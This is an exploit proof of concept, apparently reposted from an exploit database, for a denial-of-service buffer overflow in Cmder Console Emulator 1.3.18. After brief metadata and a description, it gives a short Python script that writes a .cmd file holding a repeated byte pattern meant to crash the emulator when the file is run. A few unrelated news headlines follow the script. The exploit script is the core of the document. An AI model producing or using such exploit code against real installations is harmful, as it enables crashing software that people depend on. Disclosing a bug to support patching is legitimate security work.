Cmder Console Emulator version 1.3.18 suffers from a denial of service vulnerability.
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10 # [About - Cmder Console Emulator] :
#Cmder is a software package created over absence of usable console emulator on Windows.
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
# [Security Issue] :
#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
#E.g λ cmder.cmd
# [POC] :
PAYLOAD=chr(235) + "CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
f.write(PAYLOAD)
Related posts:
Google TAG Warns of Russian Hackers Conducting Phishing Attacks in Ukraine
Hackers Stole Access Tokens from Okta’s Support Unit
GOP Rep. Nancy Mace files bill that would force Pete Buttigieg to fly commercial until FAA and South...
Microsoft: Windows 11 22H2 has reached RTM with build 22621
Oakland Police Department Adds More Officers for Weekend Violent Crime Enforcement